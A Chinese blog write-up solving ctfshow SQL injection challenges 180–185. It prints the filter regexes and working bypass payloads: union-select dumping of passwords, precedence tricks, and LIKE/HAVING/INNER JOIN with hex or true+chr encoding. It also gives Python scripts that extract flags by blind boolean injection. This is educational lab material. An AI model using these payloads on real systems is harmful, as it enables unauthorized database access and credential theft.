ctfshow sql180-185

已于 2023-12-05 15:09:01 修改
阅读量2.2k 收藏 36
点赞数 35
文章标签: sql 数据库 前端
于 2023-11-24 21:32:15 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2202_75317918/article/details/134404011
版权

180  过滤%23

%23被过滤,没办法注释了,还可以用’1’='1来闭合后边。

或者使用--%0c--

1'%0corder%0cby%0c3--%0c--

1'%0cunion%0cselect%0c1,2,database()--%0c--

1'%0cunion%0cselect%0c1,2,table_name%0cfrom%0cinformation_schema.tables%0cwhere%0ctable_schema='ctfshow_web'--%0c--

1'%0cunion%0cselect%0c1,2,column_name%0cfrom%0cinformation_schema.columns%0cwhere%0ctable_name='ctfshow_user'--%0c--

1'%0cunion%0cselect%0c1,2,password%0cfrom%0cctfshow_user--%0c--

181  优先级

过滤了很多

//对传入的参数进行了过滤
  function waf($str){
    return preg_match('/ |\*|\x09|\x0a|\x0b|\x0c|\x00|\x0d|\xa0|\x23|\#|file|into|select/i', $str);
  }

这里通过优先级进行绕过

and > or 所以and会先执行
因为1 and 0 ====0
     
1 and 0 or 1  就会变为   0 or 1  =====1
     
所以我们可以根据这个特性绕过

-1'||username='flag

182 id查询

//对传入的参数进行了过滤
  function waf($str){
    return preg_match('/ |\*|\x09|\x0a|\x0b|\x0c|\x00|\x0d|\xa0|\x23|\#|file|into|select|flag/i', $str);
  }

 因为flag被过滤了,所以不能用上面一题的

但是我们可以知道flag的id是26

-1'||id='26

 183  构造where like绕过

的确很懵b

查询语句

//拼接sql语句查找指定ID用户
  $sql = "select count(pass) from ".$_POST['tableName'].";";
      

返回逻辑

//对传入的参数进行了过滤
  function waf($str){
    return preg_match('/ |\*|\x09|\x0a|\x0b|\x0c|\x0d|\xa0|\x00|\#|\x23|file|\=|or|\x7c|select|and|flag|into/i', $str);
  }

      

查询结果

//返回用户表的记录总数
      $user_count = 0;

 tableName用post传参

我们知道当前表名叫做ctfshow_user

传参试试

$sql = "select count(pass) from ".$_POST['tableName'].";";

放进sql查询,因为语句中没有where,我们要加上where子句

select count(pass) from "ctfshow_user" where pass = ctf#";

但是我们上面可以看到很多被过滤了,=也被过滤了,用like来绕过

看下like的模糊匹配

(ctfshow_user)where(pass)like'ctf%'
ctf%匹配ctf开头

import requests
import string
url="http://aa24dff0-c290-4c34-adf3-fa3279663bca.challenge.ctf.show/select-waf.php"
payload="(ctfshow_user)where(pass)like'ctfshow{0}%'"
flag=''

for i in range(1,50):
    for j in '0123456789abcdefghijklmnopqrstuvwxyz-{}':
        payload1=payload.format(flag+j)
        data={'tableName':payload1}
        r=requests.post(url=url,data=data)
        if "$user_count = 1;" in r.text:
            flag+=j
            print(flag)

 

 184

where、单双引号、反引号都被过滤了,但是没有过滤空格。
 

查询语句

//拼接sql语句查找指定ID用户
  $sql = "select count(*) from ".$_POST['tableName'].";";
      

返回逻辑

//对传入的参数进行了过滤
  function waf($str){
    return preg_match('/\*|\x09|\x0a|\x0b|\x0c|\0x0d|\xa0|\x00|\#|\x23|file|\=|or|\x7c|select|and|flag|into|where|\x26|\'|\"|union|\`|sleep|benchmark/i', $str);
  }

      

查询结果

//返回用户表的记录总数
      $user_count = 0;

因为没有了单双引号,因此我们无法继续采用正则匹配。因此我们只能使用非字符串的方式来匹配。那么选择使用16进制来匹配。

where可以用having来绕过

看下我上篇写的having语句

SELECT TABLE_NAME,sum(ORDINAL_POSITION) FROM `COLUMNS` GROUP BY TABLE_NAME HAVING sum(ORDINAL_POSITION)>30
 
查询两列,table_name,还有ordinal_position求和,用group by来组合两列,用having来限制条件

regexp 正则匹配

 SQL学习笔记 -- REGEXP - 知乎

tableName=ctfshow_user group by pass having pass regexp(0x63746673686f777b)

ctfshow{的十六进制编码就是0x63746673686f777b

这里随便猜了一下,第一位是2

import requests
import string
url="http://e67a2fc8-3328-4651-8709-8fb693e5f87f.challenge.ctf.show/select-waf.php"
payload="ctfshow_user group by pass having pass regexp(0x63746673686f777b{0})"
flag=''

def str_to_hex(str):
    return ''.join([hex(ord(c)).replace('0x','') for c in str])  //replace()函数将十六进制字符串中的前缀"0x"替换为空字符串。
for i in range (1,50):
    for j in '0123456789abcdefghijklmnopqrstuvwxyz-{}':
        payload1=payload.format(str_to_hex(flag+j))
        # print(payload1)
        data={'tableName':payload1}
        r=requests.post(url=url,data=data)
        # print(r.text)
        if "$user_count = 1;" in r.text:
            flag+=j
            print(flag)


uuid = string.ascii_lowercase+string.digits+"-{}"
这里的j字符串变量可以用这些函数
string.ascii_lowercase 是一个包含英文字母小写的字符串常量。
string.digits 是一个包含十进制数字(0-9)的字符串常量。

一直报不出来mmd又是过期了环境,重新开了一个

 一开始搞不懂为什么要先进行ascii编码,然后直接试了一下,原来字符串不能直接进行hex十六进制编码

需要先取ASCII值,然后再hex

like

居然也可以用like 我还以为十六进制不行

but 发现只要like后面不加单引号,他也能匹配到

记住还有%,先进行编码一下

好了验证成功,我们来试一下payload

tableName=ctfshow_user group by pass having pass like (0x63746673686f777b25)

好了来修改脚本

import requests
import string
url="http://e67a2fc8-3328-4651-8709-8fb693e5f87f.challenge.ctf.show/select-waf.php"
payload="ctfshow_user group by pass having pass like (0x63746673686f777b{0})"
flag=''

def str_to_hex(str):
    return ''.join([hex(ord(c)).replace('0x','') for c in str])
for i in range (1,50):
    for j in '0123456789abcdefghijklmnopqrstuvwxyz-{}':
        payload1=payload.format(str_to_hex(flag+j+'%'))
        # print(payload1)
        data={'tableName':payload1}
        r=requests.post(url=url,data=data)
        # print(r.text)
        if "$user_count = 1;" in r.text:
            flag+=j
            print(flag)

主要是%

INNER join on

SQL INNER JOIN 关键字 | 菜鸟教程

INNER join on可以绕过where

先在mysql里面试一下

payload

tableName=ctfshow_user a inner join ctfshow_user b on b.pass like 0x63746673686f7725

脚本

import requests
import string
url="http://e67a2fc8-3328-4651-8709-8fb693e5f87f.challenge.ctf.show/select-waf.php"
payload="ctfshow_user a inner join ctfshow_user b on b.pass like 0x63746673686f777b{0}"
flag=''

def str_to_hex(str):
    return ''.join([hex(ord(c)).replace('0x','') for c in str])
for i in range (1,50):
    for j in '0123456789abcdefghijklmnopqrstuvwxyz-{}':
        payload1=payload.format(str_to_hex(flag+j+'%'))
        # print(payload1)
        data={'tableName':payload1}
        r=requests.post(url=url,data=data)
        # print(r.text)
        if "$user_count = 22;"  in r.text:
            flag+=j
            print(flag)

185  true代替数字,concat+chr代替引号

查询语句

//拼接sql语句查找指定ID用户
  $sql = "select count(*) from ".$_POST['tableName'].";";
      

返回逻辑

//对传入的参数进行了过滤
  function waf($str){
    return preg_match('/\*|\x09|\x0a|\x0b|\x0c|\0x0d|\xa0|\x00|\#|\x23|[0-9]|file|\=|or|\x7c|select|and|flag|into|where|\x26|\'|\"|union|\`|sleep|benchmark/i', $str);
  }

      

查询结果

//返回用户表的记录总数
      $user_count = 0;

1、没有数字,我们需要构造出数字

 查看该语言是否存在可以被识别成数字的关键字(true为1,false为0)

我们先在mysql里面尝试一下看看

 SELECT true from information_Schema.columns

SELECT true+true from information_Schema.columns 

 SELECT char(true+true) from information_Schema.columns

把数字通过true来代替

import requests
url="http://69d16b4e-5bb1-4d21-bb3b-217be0426d81.challenge.ctf.show/select-waf.php"
payload='ctfshow_user a inner join ctfshow_user b on b.pass like ()'
flag='ctfshow{'
def createNum(s):
    num = 'true'  //把数字定义为true
    if s == 1:
        return 'true'
    else:
        for i in range(s-1):
            num +='+true'
        return num  //数字为几就返回几个true


a=4
print(createNum(a))

import requests
url="http://69d16b4e-5bb1-4d21-bb3b-217be0426d81.challenge.ctf.show/select-waf.php"
payload='ctfshow_user a inner join ctfshow_user b on b.pass like ()'
flag='ctfshow{'
def createNum(s):
    num = 'true'
    if s == 1:
        return 'true'
    else:
        for i in range(s-1):
            num +='+true'
        return num
def createStrNum(n):
    str=''
    str+="chr("+createNum(ord(n[0]))+")"  //第一个字符转为true格式 然后再加上chr 即可
    for i in n[1:]:
        str += ",chr(" + createNum(ord(i)) + ")"
    return str


a='4'
print(createStrNum(a))

4的ascii是52

 简而言之,这两个函数实现的功能就是:

a=4

4的ascii码是52

那么第一个函数createNum(s)把数字转换成true字符串

第二个函数加上chr()

chr(true+true+.....+true)

这里还需要使用concat,使得 串在一起

import string

import requests

url = 'http://087df77e-3225-4a02-b671-225d996908c5.challenge.ctf.show/select-waf.php'
payload = 'ctfshow_user group by pass having pass like(concat({}))'
flag = 'ctfshow{'


def createNum(n):
    num = 'true'
    if n == 1:
        return 'true'
    else:
        for i in range(n - 1):
            num += "+true"
        return num


def createStrNum(c):
    str = ''
    str += 'chr(' + createNum(ord(c[0])) + ')'
    for i in c[1:]:
        str += ',chr(' + createNum(ord(i)) + ')'
    return str


uuid = string.ascii_lowercase + string.digits + "-{}"

for i in range(1, 50):
    for j in uuid:
        payload1 = payload.format(createStrNum(flag + j + "%"))
        # print(payload1)
        data = {
            'tableName': payload1
        }
        re = requests.post(url=url, data=data)
        if "$user_count = 0;" not in re.text:
            flag += j
            print(flag)
            if j == '}':
                exit()
            break

木…
关注
  • 35
    点赞
  • 36
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
ctfshow web-180
m0_53095017的博客
05-25 120
看得出来,%09,%0a,%0b,%0d,空格这些都让过滤了。过滤的东西不多,可以手测测出来。这里给出一个fuzz脚本。
ctfshow学习记录-web入门(sql注入181-190)
龟速更新的九某人
09-24 1988
ctfshow学习记录-web入门(sql注入web181-web190)
CTFSHOW-sql注入
Yb_140的博客
08-13 2402
web171 最简单的sql注入,先演示基本操作 payload: -1' union select 1,2,database() --+ //得到数据库名为ctfshow_web -1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='ctfshow_web' --+ //得到数据表名为ctfshow_user -1' union select
CTFSHOW -SQL 注入
m0_64180167的博客
11-13 503
重新来做一遍 争取不看wp。
CTFSHOW-WEB入门-SQL注入
qq_44657899的博客
05-29 8642
文章目录前言web171web172web173web174web175 前言 最近发现对sql注入的相关知识点有点生疏和忘记了,做做ctfhshow的sql注入来巩固和学习一些新姿势。 web171 直接union注入即可 # 判断列数 ' order by 3 --+ # 查数据库名 ' union select 1,2,database() --+ # 查表名 ' union select 1,2,concat(table_name) from information_schema.tables
SQL2022-SSEI-Dev
11-14
SQL2022-SSEI-Dev
AI自动生成SQL语句的开源代码 sqlcoder-main.zip
02-09
开源的AI自动生成SQL语句源代码,这款SQLCoder-70B-Alpha在文本到SQL的转换能力上超越了包括GPT-4在内的所有通用模型,它能更准确地理解你的需求,并生成相应的SQL查询。SQLCoder2和SQLCoder-7B模型已经向公众开放,...
SQL2019-SSEI-Dev.exe
05-11
sql server 2019官方版本中文安装包,安装过程简单明了 SQL Server 是Microsoft 公司推出的关系型数据库管理系统。具有使用方便可伸缩性好与相关软件集成程度高等优点,可跨越从运行Microsoft Windows 98 的膝上型...
SQL2019-SSEI-Expr.exe
04-07
SQL2019在线安装小工具;亲测可以安装
使用flink-connector-sqlserver-cdc 2.3.0把数据从SQL Server实时同步到MySQL
06-25
使用flink-connector-sqlserver-cdc 2.3.0把数据从SQL Server实时同步到MySQL中。
CTFshow之web171~180---SQL注入(1)
金 帛的博客
06-04 2007
ctfshowSQL注入的wp
ctfshow-sql注入-超详解(172-200)
qq_50589021的博客
08-05 2474
前言 今天是2021/7/25,正式进入sql注入专题,目标:加强python的学习,达到通过写python脚本,加快注入速度的程度,掌握sql在php编程中的一系列查询语句。 新手区 可以看看Y4师傅以前记录的小笔记 SQL注入之MySQL注入的学习笔记(一) SQL注入之MySQL注入学习笔记(二) 2021-7-25 web172、web173——hex() 、to_base64() 查询语句 //拼接sql语句查找指定ID用户 $sql = "select username,password fro
CTFShow SQL入门记录
paidx0
05-22 354
CTFShow SQL入门记录 入门SQL注入,也作为一个学习记录吧,有150道题慢慢更新,也希望学到新姿势(只会用sqlmap一把索的菜鸡) web171 这里没有任何的过滤就直接常规查找 查数据库 payload = "-1'union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+" 查列名 payload="-1'union select 1,2,
CTFshow_web入门_sql注入wp
monster663的博客
02-22 1117
web171 150题,准备好了吗? 1' or 1=1--+ web172 无过滤直接注,这里演示一下比较完整的注入过程,#后面表示回显结果 1' or 1=1--+ 测试注入点 1' order by 2--+ 测试列数 1' union select 1,2--+ 回显 1' union select 1,(select group_concat(schema_name) from information_schema..
CTFSHOW sql注入(一)
qq_51754713的博客
10-04 4836
title: CTFSHOW-sql注入(一) data: 2021-09-15 tags: CTF-web CTFSHOW sql注入(一) 开始一周的高强度sql注入训练,先从ctfshow 的基础开始。 包含了CTFSHOW sql注入的 170-200题。 这里都是sql注入的一些基本知识点。主要是了解sql注入的常见题型。 题目 web 171(万能密码) 万能密码: 1'or 1=1-- - web 172(过滤回显内容) 这里看出有一定的waf,我们并不能在username里面.
通过ctfshow学习sql注入
一只菜鸡
02-23 525
CTFSHOW-SQL注入 CTFshow-web入门-SQL注入 web171 //拼接sql语句查找指定ID用户 $sql = "select username,password from user where username !='flag' and id = '".$_GET['id']."' limit 1;"; 可以看出来有三个字段,那可以直接联合查询看看 1' union select 1,2,3%23 1' union select database(),2,3%23 1' un
pgbackrest 备份工具使用 postgresql
liyayou的博客
05-10 670
我们的备份策略基本是,1天1次完整备份,1个小时1次差异备份。注意:命令中postgres:postgres,是为了授权给postgres用户权限,而且最好是用postgres用户,不然会遇到很多操作报无权限【因为postgresql在安装初始化的时候就自动创建了一个系统用户postgres,默认使用的也是postgres】#加上 --delta ,pgBackRest 自动确定数据库集群目录中的哪些文件可以保留,哪些文件需要从备份中恢复 — 它还会删除备份清单中不存在的文件,以便处理不同的更改。
openGauss学习笔记-279 openGauss性能调优-实际调优案例08-改写SQL消除in-clause
超哥的博客
05-10 72
openGauss学习笔记-279 openGauss性能调优-实际调优案例08-改写SQL消除in-clause279.1 现象描述279.2 优化说明 openGauss学习笔记-279 open
Oracle数据库之PL/SQL基本语法(八)
最新发布
pursue_mony的博客
05-14 110
PL/SQL 是 Oracle 数据库中使用的过程化 SQL 语言扩展,它允许你在 SQL 语句中嵌入控制结构、变量声明、异常处理等。用于在 PL/SQL 块中输出调试信息。为了看到这些信息,你需要在 SQL*Plus 或其他客户端中启用它(例如,使用。PL/SQL 代码通常被组织在块(block)中。一个块包含三个部分:声明部分、执行部分和异常处理部分。包是 PL/SQL 中一种将逻辑、变量、常量、游标、类型、子程序、异常等组合在一起的数据库对象。在 PL/SQL 中,你可以在。部分来处理运行时错误。
ctfshow-web-web红包题
07-14
ctfshow-web-web红包题是一道CTF比赛中的网络安全题目。这道题目的背景是一个在线购物网站,要求我们通过安全漏洞来获得网站的红包。 首先,我们可以检查网站的源代码,寻找可能存在的漏洞。在网站的前端页面中,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值